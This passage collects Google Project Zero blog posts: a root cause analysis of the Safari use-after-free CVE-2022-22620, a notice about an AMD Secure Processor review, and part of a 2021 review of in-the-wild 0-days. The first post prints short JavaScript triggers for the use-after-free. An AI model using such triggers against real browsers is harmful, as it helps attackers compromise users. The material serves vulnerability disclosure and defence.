An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue* to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp 

1094

1094

// This does the same kind of work that didOpenURL does, except it relies on the fact

1095

1095

// that a higher level already checked that the URLs match and the scrolling is the right thing to do.

1096

 

void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)

 

1096

void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. When looking at the git blame for this line prior to our patch, it’s a very interesting commit. The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The Changelog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});

history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");

history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for
state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is, why did the patch author think that loadInSameDocument would not need to hold a reference. From the December 2016 commit ChangeLog: Take a raw pointer for the serialized script value state object. No one was passing ownership.

My assessment is that it’s due to the October 2016 changes in HistoryItem:stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject() which as of October 2016 now passed a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, then it’s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of changes to fix the 2013 vulnerability…and then revert those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorAndGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument:

The tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSamePage is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument

  FrameLoader::scrollToFragmentWithParentBoundary

    FrameView::scrollToFragment

      FrameView::scrollToFragmentInternal

        FocusController::setFocusedElement

          FocusController::setFocusedFrame

            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));

a = document.body.appendChild(document.createElement("a"));

a.id = "foo";

history.pushState("state1", "", location + "#foo");

history.pushState("state2", "");

setTimeout(() => {

        input.focus();

        input.onblur = () => history.replaceState("state3", "");

        setTimeout(() => history.back(), 1000);

}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, refactoring and security efforts are generally under-appreciated and under-rewarded, and lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts, will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

Release of Technical Report into the AMD Security Processor

By: Ryan
10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

The More You Know, The More You Know You Don’t Know

By: Ryan
19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

bar graph that shows the number of Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the  TurboFan JIT in Chromium’s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411 targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used CVE-2021-40444, but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOs is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP.  It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and